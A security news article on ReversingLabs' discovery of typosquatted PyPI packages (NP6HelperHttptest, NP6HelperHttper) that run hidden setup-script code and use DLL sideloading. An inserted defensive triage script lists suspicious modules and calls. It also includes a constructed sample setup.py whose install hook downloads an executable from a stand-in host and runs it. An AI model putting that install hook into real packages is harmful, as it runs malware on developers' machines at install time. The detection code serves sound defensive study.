Security researchers have identified a concerning uptick in malicious activities infiltrating open-source platforms and code repositories.
This trend encompasses a wide array of malicious activities, including hosting command-and-control infrastructure, storing stolen data and disseminating various forms of malware.
In a recent discovery, ReversingLabs reverse engineer Karlo Zanki uncovered two suspicious packages on the Python Package Index, named NP6HelperHttptest and NP6HelperHttper.
These packages were found to employ DLL sideloading, a technique malicious actors use to execute code discreetly and avoid detection by security monitoring tools.
Typosquatting and repojacking, also used in the deployment of these packages, are common tactics malicious actors employ to distribute look-alike packages, aiming to deceive developers into incorporating them into their applications.
The recent discovery of NP6HelperHttptest and NP6HelperHttper on PyPI exemplifies such tactics: the packages exploited their similarity to the legitimate NP6 helper packages (NP6 is a marketing automation tool developed by Chapvision) to dupe unsuspecting users.
In this case, ReversingLabs discovered that the NP6 PyPI account wasn't officially associated with Chapvision; rather, it belonged to a Chapvision developer's personal account.
It remains uncertain whether the company was aware of the existence of the account, or of the NP6HelperHttp and NP6HelperConfig tools.
Upon notification of these packages by ReversingLabs, Chapvision confirmed that one of their employees had indeed published the helper tools.
Shortly thereafter, the packages were removed from PyPI. Further examination of the malicious packages revealed a sophisticated scheme in which malicious code hidden in the packages' setup scripts was executed at install time.
These scripts facilitated the download and execution of both legitimate and malicious files, with the latter posing significant security risks.
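As an added illustration (not from the article or from ReversingLabs' analysis), the following static triage script flags the install-time download-and-execute pattern described above. The setup.py it scans is a constructed sample that assumes a setuptools install hook, not the real packages' code.

```python
import ast

# Modules and call names a setup.py has no legitimate reason to use at install time.
SUSPICIOUS_MODULES = {"urllib.request", "requests", "subprocess", "ctypes", "base64", "socket"}
SUSPICIOUS_CALLS = {"urlopen", "urlretrieve", "Popen", "system", "startfile", "b64decode", "exec", "eval"}

def inspect_setup(source: str) -> dict:
    """Walk the AST of a setup.py and collect install-time risk signals."""
    findings = {"imports": set(), "calls": set(), "cmdclass": False}
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            findings["imports"].update(a.name for a in node.names if a.name in SUSPICIOUS_MODULES)
        elif isinstance(node, ast.ImportFrom) and node.module in SUSPICIOUS_MODULES:
            findings["imports"].add(node.module)
        elif isinstance(node, ast.Call):
            func = node.func
            name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", None)
            if name in SUSPICIOUS_CALLS:
                findings["calls"].add(name)
            elif name == "setup":  # cmdclass= overrides the install/build commands
                findings["cmdclass"] = any(kw.arg == "cmdclass" for kw in node.keywords)
    return findings

def is_suspicious(findings: dict) -> bool:
    """A setup script that both imports network/process modules and calls
    download/execute primitives warrants manual review before installation."""
    return bool(findings["imports"]) and bool(findings["calls"])

# Constructed sample (an assumption, not the real package): an install hook that
# fetches files and launches one, the pattern the article attributes to the packages.
SAMPLE_SETUP = '''
from setuptools import setup
from setuptools.command.install import install
import urllib.request, subprocess

class PostInstall(install):
    def run(self):
        install.run(self)
        urllib.request.urlretrieve("http://example.invalid/a.exe", "a.exe")
        subprocess.Popen(["a.exe"])

setup(name="NP6HelperHttptest", version="0.1", cmdclass={"install": PostInstall})
'''
```

Running `inspect_setup(SAMPLE_SETUP)` reports the two imports, the `urlretrieve` and `Popen` calls and the `cmdclass` override, while a plain `setup(name=..., version=...)` script produces no findings.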
ReversingLabs' research not only shed light on individual instances of malicious activity but also suggested a broader campaign involving multiple packages and sophisticated tactics, all relying on DLL sideloading.
This Cyber News was published on www.infosecurity-magazine.com. Publication date: Tue, 20 Feb 2024 17:45:27 +0000